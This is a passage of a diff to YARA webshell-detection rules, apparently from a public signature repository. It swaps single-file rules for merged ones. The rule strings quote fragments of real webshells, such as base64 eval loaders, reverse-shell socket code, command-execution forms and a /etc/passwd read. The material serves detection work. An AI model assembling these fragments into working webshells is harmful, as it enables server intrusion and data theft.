+		logic_hash = "14eccd07e7bef9d570f75fc4adc204d175dcfbb5b950bdb3e25a65d3c5bb0310"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "a7e25b8ac605753ed0c438db93f6c498"
+		hash1 = "fb8c6c3a69b93e5e7193036fd31a958d"
+		hash2 = "4cc68fa572e88b669bce606c7ace0ae9"
+		hash3 = "fa87bbd7201021c1aefee6fcc5b8e25a"
 
 	strings:
-		$s4 = "&nbsp;&nbsp;<?php echo buildUrl(\"<font color=\\\"navy\\\">["
-		$s6 = "echo \"</form><form action=\\\"$SFileName?$urlAdd\\\" method=\\\"post\\\"><input"
-		$s9 = "if  ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset("
+		$s0 = "<input title=\"Upload selected file to the current working directory\" type=\"Su"
+		$s5 = "<input title=\"Launch command in current directory\" type=\"Submit\" class=\"but"
+		$s6 = "<input title=\"Delete all selected files and directories incl. subdirs\" class="
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_PHP_G00Nv13
+rule SIGNATURE_BASE_Webshell_Browser_201_3_400_In_Jfolder_Jfolder01_Jsp_Leo_Ma_Warn_Webshell_Nc_Download
 {
 	meta:
-		description = "Web Shell - file g00nv13.php"
+		description = "Web Shell"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1162-L1176"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2397-L2424"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "35ad2533192fe8a1a76c3276140db820"
-		logic_hash = "dd9f03a7ad0d2b73f7a8602ab267e0e8e5cb1f9250f9a25c86ded3797df2f8d5"
+		logic_hash = "0bf0fd37b542c9362a47180ee03ea28995b48d483f72273e472292a320a3ddee"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "37603e44ee6dc1c359feb68a0d566f76"
+		hash1 = "a7e25b8ac605753ed0c438db93f6c498"
+		hash2 = "fb8c6c3a69b93e5e7193036fd31a958d"
+		hash3 = "36331f2c81bad763528d0ae00edf55be"
+		hash4 = "793b3d0a740dbf355df3e6f68b8217a4"
+		hash5 = "8979594423b68489024447474d113894"
+		hash6 = "ec482fc969d182e5440521c913bab9bd"
+		hash7 = "f98d2b33cd777e160d1489afed96de39"
+		hash8 = "4b4c12b3002fad88ca6346a873855209"
+		hash9 = "4cc68fa572e88b669bce606c7ace0ae9"
+		hash10 = "e9a5280f77537e23da2545306f6a19ad"
+		hash11 = "598eef7544935cf2139d1eada4375bb5"
+		hash12 = "fa87bbd7201021c1aefee6fcc5b8e25a"
 
 	strings:
-		$s1 = "case \"zip\": case \"tar\": case \"rar\": case \"gz\": case \"cab\": cas"
-		$s4 = "if(!($sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_p"
+		$s4 = "UplInfo info = UploadMonitor.getInfo(fi.clientFileName);" fullword
+		$s5 = "long time = (System.currentTimeMillis() - starttime) / 1000l;" fullword
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Php_H6Ss
+rule SIGNATURE_BASE_Webshell_Shell_Phpspy_2006_Arabicspy
 {
 	meta:
-		description = "Web Shell - file h6ss.php"
+		description = "Web Shell - from files shell.php, phpspy_2006.php, arabicspy.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1177-L1190"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2425-L2442"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "272dde9a4a7265d6c139287560328cd5"
-		logic_hash = "c4001be111ff271335dd65c15c59da979a8e202bcf58a7f10de7f03644472153"
+		logic_hash = "bd9f1ffdbf94dd5a871fc7c3b31d2357e99265d02bfe1c836f82d251053dce7d"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "791708057d8b429d91357d38edf43cc0"
+		hash1 = "40a1f840111996ff7200d18968e42cfe"
+		hash2 = "e0202adff532b28ef1ba206cf95962f2"
 
 	strings:
-		$s0 = "<?php eval(gzuncompress(base64_decode(\""
+		$s0 = "elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype"
+		$s8 = "echo \"<form action=\\\"?action=shell&dir=\".urlencode($dir).\"\\\" method=\\\"P"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_Zx
+rule SIGNATURE_BASE_Webshell_In_Jfolder_Jfolder01_Jsp_Leo_Warn
 {
 	meta:
-		description = "Web Shell - file zx.jsp"
+		description = "Web Shell - from files in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, warn.jsp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1191-L1204"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2443-L2463"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "67627c264db1e54a4720bd6a64721674"
-		logic_hash = "d97df624801d0f24141dfe7074d290a56e639af7d867c907362ff4434c3eeac0"
+		logic_hash = "00c3667438a688b990cf1c8bb6db52be7c6d1b36192dece4e8b07edda68f4b72"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "793b3d0a740dbf355df3e6f68b8217a4"
+		hash1 = "8979594423b68489024447474d113894"
+		hash2 = "ec482fc969d182e5440521c913bab9bd"
+		hash3 = "f98d2b33cd777e160d1489afed96de39"
+		hash4 = "4b4c12b3002fad88ca6346a873855209"
+		hash5 = "e9a5280f77537e23da2545306f6a19ad"
 
 	strings:
-		$s0 = "if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application.g"
+		$s4 = "sbFile.append(\"  &nbsp;<a href=\\\"javascript:doForm('down','\"+formatPath(strD"
+		$s9 = "sbFile.append(\" &nbsp;<a href=\\\"javascript:doForm('edit','\"+formatPath(strDi"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Ani_Shell
+rule SIGNATURE_BASE_Webshell_2_520_Icesword_Job_Ma1_Ma4_2
 {
 	meta:
-		description = "Web Shell - file Ani-Shell.php"
+		description = "Web Shell - from files 2.jsp, 520.jsp, icesword.jsp, job.jsp, ma1.jsp, ma4.jsp, 2.jsp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1205-L1220"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2464-L2486"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "889bfc9fbb8ee7832044fc575324d01a"
-		logic_hash = "c8caf8686c36a41b5aae093e88b8872350cf625c59a14389c5df93f284c8f05a"
+		logic_hash = "765efb4f776d9ffe5dab1b5decbb60df654e1de9ab8ae7e0437c5c8f717642b9"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "64a3bf9142b045b9062b204db39d4d57"
+		hash1 = "9abd397c6498c41967b4dd327cf8b55a"
+		hash2 = "077f4b1b6d705d223b6d644a4f3eebae"
+		hash3 = "56c005690da2558690c4aa305a31ad37"
+		hash4 = "532b93e02cddfbb548ce5938fe2f5559"
+		hash5 = "6e0fa491d620d4af4b67bae9162844ae"
+		hash6 = "7eabe0f60975c0c73d625b7ddf7b9cbd"
 
 	strings:
-		$s0 = "$Python_CODE = \"I"
-		$s6 = "$passwordPrompt = \"\\n================================================="
-		$s7 = "fputs ($sockfd ,\"\\n==============================================="
+		$s2 = "private String[] _textFileTypes = {\"txt\", \"htm\", \"html\", \"asp\", \"jsp\","
+		$s3 = "\\\" name=\\\"upFile\\\" size=\\\"8\\\" class=\\\"textbox\\\" />&nbsp;<input typ"
+		$s9 = "if (request.getParameter(\"password\") == null && session.getAttribute(\"passwor"
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_K8Cmd
+rule SIGNATURE_BASE_Webshell_Phpspy_2005_Full_Phpspy_2005_Lite_PHPSPY
 {
 	meta:
-		description = "Web Shell - file k8cmd.jsp"
+		description = "Web Shell - from files phpspy_2005_full.php, phpspy_2005_lite.php, PHPSPY.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		id = "41a0560a-b22e-5028-8ad1-710c5758cb1d"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1221-L1234"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2487-L2505"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b39544415e692a567455ff033a97a682"
-		logic_hash = "e523a5b1118c6f4d5798f130c00466c7945d27a6fbe0d4cb3a40b7f36da2a502"
+		logic_hash = "80c8e7b50aea91284a25ffd3a07d8705c24b6a95a58f42ec6043ececcff32dbb"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "b68bfafc6059fd26732fa07fb6f7f640"
+		hash1 = "42f211cec8032eb0881e87ebdb3d7224"
+		hash2 = "0712e3dc262b4e1f98ed25760b206836"
 
 	strings:
-		$s2 = "if(request.getSession().getAttribute(\"hehe\").toString().equals(\"hehe\"))" fullword
+		$s6 = "<input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_POST['comma"
+		$s7 = "echo $msg=@copy($_FILES['uploadmyfile']['tmp_name'],\"\".$uploaddir.\"/\".$_FILE"
+		$s8 = "<option value=\"passthru\" <? if ($execfunc==\"passthru\") { echo \"selected\"; "
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_Cmd
+rule SIGNATURE_BASE_Webshell_Shell_Phpspy_2006_Arabicspy_Hkrkoz
 {
 	meta:
-		description = "Web Shell - file cmd.jsp"
+		description = "Web Shell - from files shell.php, phpspy_2006.php, arabicspy.php, hkrkoz.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1236-L1249"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2506-L2523"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5391c4a8af1ede757ba9d28865e75853"
-		logic_hash = "e48d4e2d14a3605fd9dda03630820a0fb53d893cc4d283739fde11f9ab7d9d1e"
+		logic_hash = "228e0a73f14da2957f75ae898fdbcf2386deb366df6ddc312162ab723bac44ba"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "791708057d8b429d91357d38edf43cc0"
+		hash1 = "40a1f840111996ff7200d18968e42cfe"
+		hash2 = "e0202adff532b28ef1ba206cf95962f2"
+		hash3 = "802f5cae46d394b297482fd0c27cb2fc"
 
 	strings:
-		$s6 = "out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");" fullword
+		$s5 = "$prog = isset($_POST['prog']) ? $_POST['prog'] : \"/c net start > \".$pathname."
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_K81
+rule SIGNATURE_BASE_Webshell_C99_Shell_Ci_Biz_Was_Here_C100_V_Xxx
 {
 	meta:
-		description = "Web Shell - file k81.jsp"
+		description = "Web Shell"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1251-L1265"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2524-L2543"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "41efc5c71b6885add9c1d516371bd6af"
-		logic_hash = "f9c6b5bec9313c6fd059055fa18332675838419bba3348bb852b50806f26ccb2"
+		logic_hash = "ccc3cb553f7b5d089a43612d48522cc4a66b4a8ab433321ae1a716a8fa57b62c"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "61a92ce63369e2fa4919ef0ff7c51167"
+		hash1 = "f2fa878de03732fbf5c86d656467ff50"
+		hash2 = "27786d1e0b1046a1a7f67ee41c64bf4c"
+		hash3 = "0f5b9238d281bc6ac13406bb24ac2a5b"
+		hash4 = "68c0629d08b1664f5bcce7d7f5f71d22"
+		hash5 = "048ccc01b873b40d57ce25a4c56ea717"
 
 	strings:
-		$s1 = "byte[] binary = BASE64Decoder.class.newInstance().decodeBuffer(cmd);" fullword
-		$s9 = "if(cmd.equals(\"Szh0ZWFt\")){out.print(\"[S]\"+dir+\"[E]\");}" fullword
+		$s8 = "else {echo \"Running datapipe... ok! Connect to <b>\".getenv(\"SERVER_ADDR\""
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_ASP_Zehir
+rule SIGNATURE_BASE_Webshell_2008_2009Lite_2009Mssql
 {
 	meta:
-		description = "Web Shell - file zehir.asp"
+		description = "Web Shell - from files 2008.php, 2009lite.php, 2009mssql.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1266-L1279"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2544-L2561"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0061d800aee63ccaf41d2d62ec15985d"
-		logic_hash = "90920258017cf189da128dce477e71f0040bc66aefa6f018f64db64d22f60ae5"
+		logic_hash = "ae33048856440e25972aa5483b60e775f50f60a9ef5e77a58edd60eacdcd9ee3"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "3e4ba470d4c38765e4b16ed930facf2c"
+		hash1 = "3f4d454d27ecc0013e783ed921eeecde"
+		hash2 = "aa17b71bb93c6789911bd1c9df834ff9"
 
 	strings:
-		$s9 = "Response.Write \"<font face=wingdings size=3><a href='\"&dosyaPath&\"?status=18&"
+		$s0 = "<a href=\"javascript:godir(\\''.$drive->Path.'/\\');"
+		$s7 = "p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Worse_Linux_Shell_1
+rule SIGNATURE_BASE_Webshell_Shell_Phpspy_2005_Full_Phpspy_2005_Lite_Phpspy_2006_Arabicspy_PHPSPY_Hkrkoz
 {
 	meta:
-		description = "Web Shell - file Worse Linux Shell.php"
+		description = "Web Shell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		id = "41a0560a-b22e-5028-8ad1-710c5758cb1d"
 		date = "2014-01-28"
 		modified = "2025-03-29"
-		old_rule_name = "webshell_Worse_Linux_Shell"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1280-L1294"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2562-L2583"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8338c8d9eab10bd38a7116eb534b5fa2"
-		logic_hash = "a24e7ae7c722da7f265f032315b1e8e402c2fc4a2a54a685671a9e52124f6553"
+		logic_hash = "5da06481cf789e71969a5b54a33bfab41e08a1961cc056604a696203fef48422"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "791708057d8b429d91357d38edf43cc0"
+		hash1 = "b68bfafc6059fd26732fa07fb6f7f640"
+		hash2 = "42f211cec8032eb0881e87ebdb3d7224"
+		hash3 = "40a1f840111996ff7200d18968e42cfe"
+		hash4 = "e0202adff532b28ef1ba206cf95962f2"
+		hash5 = "0712e3dc262b4e1f98ed25760b206836"
+		hash6 = "802f5cae46d394b297482fd0c27cb2fc"
 
 	strings:
-		$s0 = "system(\"mv \".$_FILES['_upl']['tmp_name'].\" \".$currentWD"
+		$s0 = "$mainpath_info           = explode('/', $mainpath);" fullword
+		$s6 = "if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == \"d"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Zacosmall
+rule SIGNATURE_BASE_Webshell_807_Dm_Jspspyjdk5_M_Cofigrue
 {
 	meta:
-		description = "Web Shell - file zacosmall.php"
+		description = "Web Shell - from files 807.jsp, dm.jsp, JspSpyJDK5.jsp, m.jsp, cofigrue.jsp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1295-L1308"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2584-L2603"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5295ee8dc2f5fd416be442548d68f7a6"
-		logic_hash = "739d58e3ab6712c703e0cb0e0070afec3376844b77ed081a5d12407cabb62319"
+		logic_hash = "0fc7ac740e147bd3703dac74743b19148aa7bb359cc5f347acf3b0dbe26bf752"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
+		hash1 = "14e9688c86b454ed48171a9d4f48ace8"
+		hash2 = "341298482cf90febebb8616426080d1d"
+		hash3 = "88fc87e7c58249a398efd5ceae636073"
+		hash4 = "349ec229e3f8eda0f9eb918c74a8bf4c"
 
 	strings:
-		$s0 = "if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd).\"</strong><hr>"
+		$s1 = "url_con.setRequestProperty(\"REFERER\", \"\"+fckal+\"\");" fullword
+		$s9 = "FileLocalUpload(uc(dx())+sxm,request.getRequestURL().toString(),  \"GBK\");" fullword
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Liz0Zim_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit
+rule SIGNATURE_BASE_Webshell_Dive_Shell_1_0_Emperor_Hacking_Team_Xxx
 {
 	meta:
-		description = "Web Shell - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php"
+		description = "Web Shell"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1309-L1322"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2604-L2621"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c6eeacbe779518ea78b8f7ed5f63fc11"
-		logic_hash = "9630fc0371193bfbd0bd4fb15856477e7739fc9f11ee539d119ee837b1a54502"
+		logic_hash = "8bf11041a16060fa32431adfe33727863355bae7fec2cf841dcc919092db5c80"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "1b5102bdc41a7bc439eea8f0010310a5"
+		hash1 = "f8a6d5306fb37414c5c772315a27832f"
+		hash2 = "37cb1db26b1b0161a4bf678a6b4565bd"
 
 	strings:
-		$s1 = "<option value=\"cat /etc/passwd\">/etc/passwd</option>" fullword
+		$s1 = "if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== fals"
+		$s9 = "if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {" fullword
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Redirect
+rule SIGNATURE_BASE_Webshell_404_Data_In_Jfolder_Jfolder01_Xxx
 {
 	meta:
-		description = "Web Shell - file redirect.asp"
+		description = "Web Shell"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1323-L1336"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2622-L2644"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "97da83c6e3efbba98df270cc70beb8f8"
-		logic_hash = "b16026623fe7802db9823ad4a3dab051747eea6bd41ce72a0c8c6757bfa2c6f7"
+		logic_hash = "171b811c1b93f99f3070692a91a0462f80d9d52ecf26d7fb7297a8bdd9a4c014"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "7066f4469c3ec20f4890535b5f299122"
+		hash1 = "9f54aa7b43797be9bab7d094f238b4ff"
+		hash2 = "793b3d0a740dbf355df3e6f68b8217a4"
+		hash3 = "8979594423b68489024447474d113894"
+		hash4 = "ec482fc969d182e5440521c913bab9bd"
+		hash5 = "f98d2b33cd777e160d1489afed96de39"
+		hash6 = "4b4c12b3002fad88ca6346a873855209"
+		hash7 = "c93d5bdf5cf62fe22e299d0f2b865ea7"
+		hash8 = "e9a5280f77537e23da2545306f6a19ad"
 
 	strings:
-		$s7 = "var flag = \"?txt=\" + (document.getElementById(\"dl\").checked ? \"2\":\"1\" "
+		$s4 = "&nbsp;<TEXTAREA NAME=\"cqq\" ROWS=\"20\" COLS=\"100%\"><%=sbCmd.toString()%></TE"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_Cmdjsp
+rule SIGNATURE_BASE_Webshell_Jsp_Reverse_Jsp_Reverse_Jspbd
 {
 	meta:
-		description = "Web Shell - file cmdjsp.jsp"
+		description = "Web Shell - from files jsp-reverse.jsp, jsp-reverse.jsp, jspbd.jsp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1337-L1350"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2645-L2663"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b815611cc39f17f05a73444d699341d4"
-		logic_hash = "b4822e47a27c598be746ac71bf9b60dafe08d50c83a2dfee5e40ea384fcff21a"
-		score = 70
+		logic_hash = "cd7409bb6ace3044f3d0bf380133c4fe4a7c0c0309f9d800b397439aa95f81fc"
+		score = 50
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "8b0e6779f25a17f0ffb3df14122ba594"
+		hash1 = "ea87f0c1f0535610becadf5a98aca2fc"
+		hash2 = "7d5e9732766cf5b8edca9b7ae2b6028f"
 
 	strings:
-		$s5 = "<FORM METHOD=GET ACTION='cmdjsp.jsp'>" fullword
+		$s0 = "osw = new BufferedWriter(new OutputStreamWriter(os));" fullword
+		$s7 = "sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());" fullword
+		$s9 = "isr = new BufferedReader(new InputStreamReader(is));" fullword
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Java_Shell
+rule SIGNATURE_BASE_Webshell_400_In_Jfolder_Jfolder01_Jsp_Leo_Warn_Webshell_Nc
 {
 	meta:
-		description = "Web Shell - file Java Shell.jsp"
+		description = "Web Shell - from files 400.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, warn.jsp, webshell-nc.jsp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1351-L1365"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2664-L2688"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "36403bc776eb12e8b7cc0eb47c8aac83"
-		logic_hash = "0d313ff81a36b456326df0054853c31d69710fc142fcfa65747691238af4e635"
+		logic_hash = "74e31e51f2cb46a042e8591ffb44fe68fb591d202c8171c6afb556eddb381f6f"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "36331f2c81bad763528d0ae00edf55be"
+		hash1 = "793b3d0a740dbf355df3e6f68b8217a4"
+		hash2 = "8979594423b68489024447474d113894"
+		hash3 = "ec482fc969d182e5440521c913bab9bd"
+		hash4 = "f98d2b33cd777e160d1489afed96de39"
+		hash5 = "4b4c12b3002fad88ca6346a873855209"
+		hash6 = "e9a5280f77537e23da2545306f6a19ad"
+		hash7 = "598eef7544935cf2139d1eada4375bb5"
 
 	strings:
-		$s4 = "public JythonShell(int columns, int rows, int scrollback) {" fullword
-		$s9 = "this(null, Py.getSystemState(), columns, rows, scrollback);" fullword
